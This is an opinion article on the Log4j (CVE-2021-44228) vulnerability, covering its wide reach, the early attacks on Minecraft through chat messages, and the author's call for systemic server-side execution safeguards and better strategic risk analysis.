The log4j (CVE-2021-44228) bug is considered a major global vulnerability by security analysts. The bug relates to a Java logging function on servers. It allows remotely executable control of servers and client home computers.
In terms of user demographics, this logging function is pretty much universal, also used by governments and corporations. Equally problematic, the bug is also directly related to the ubiquitous and highly regarded open-source Apache suite of servers.
It’s big enough to be called “a threat to the internet” by NSA CS director Rob Joyce. Exploit code was posted online, adding more possible actors and more risks.
It’s also apparently enough of a problem for Microsoft, Apple, and Valve not to respond to media inquiries just yet. Traditionally, this uncharacteristic reticence means “we’re working on it”.
A very unkind first hit for this bug was on the big gaming site, Minecraft. To access Minecraft, all hackers had to do was post in a chatbox. The logging process presumably did the rest. Minecraft has since provided a fix.
(Arstechnica cites the fix as requiring a manual install on this link.)
The bigger problem – Not enough strategic risk analysis and prediction, but a possible benefit, too.
Rather than be wise after the event, let’s try being wise before the next one, shall we?
Let’s also try to get some value out of the current mess:
This widely-distributed server software is a gigantic predictable target. It would be a natural target during a war, for example, able to trash any number of systems with ease.
This vulnerability will get people looking for other easy-access options after this one is fixed. The need is to identify possible candidates now, not when the next problem happens.
This is a comparatively low-tech risk, amplified by scale. When someone breaks into a house, the way they got in is less of an issue than what happens when they get in. The problem is less the bug than its range of reach and scope of possible applications. This bug simply allows access. Such a lower-level threat may not be a high priority in security management, and that’s part of the problem.
Analysis of access capabilities for software should be the core metric for risk assessment. Whatever else this bug does, it makes a very serious point. Doesn’t matter what the software is; if it’s at all capable of going anywhere and accessing everywhere, it’s a possible major threat by definition. The good news here is that this very basic perspective, as pedantic as it has to be, can do the job of broad-scope threat identification.
Vulnerable servers aren’t exactly new. Why has it taken so long, after so many cases, to recognize the need for a reliable overwatch for servers? There’s only so much people can do on the ground when things happen. I had to fight off a live, onsite-listing-itself homemade DIY botnet attack manually, and it took forever. I was literally working on the dashboard, with no support available while the thing kept spamming away, trashing the site every second. Through the server, if I’d been able to do it, I could have shut it off a lot quicker.
Where are all the cyber heroes? Hacking is so easy (a few characters can do it) and yet cyber security seems to be uninterested in simply setting up “no execute” regimes for any fluff that blows in online. I’ve seen code execute through a site search inquiry myself. How is that secure? Why is it so easy?
This is one of the few all-on-same-page security issues where major players like Microsoft, Apple, Apache, and Valve can achieve a lot, fast. Whatever the fix, it needs to be systemic, preventing the movement of bugs through servers. Any “no go” will do, as long as it works. Take the problem out of the security do-nothings and give it to the experts to fix it. It could also help general security and prevent the spread of malware.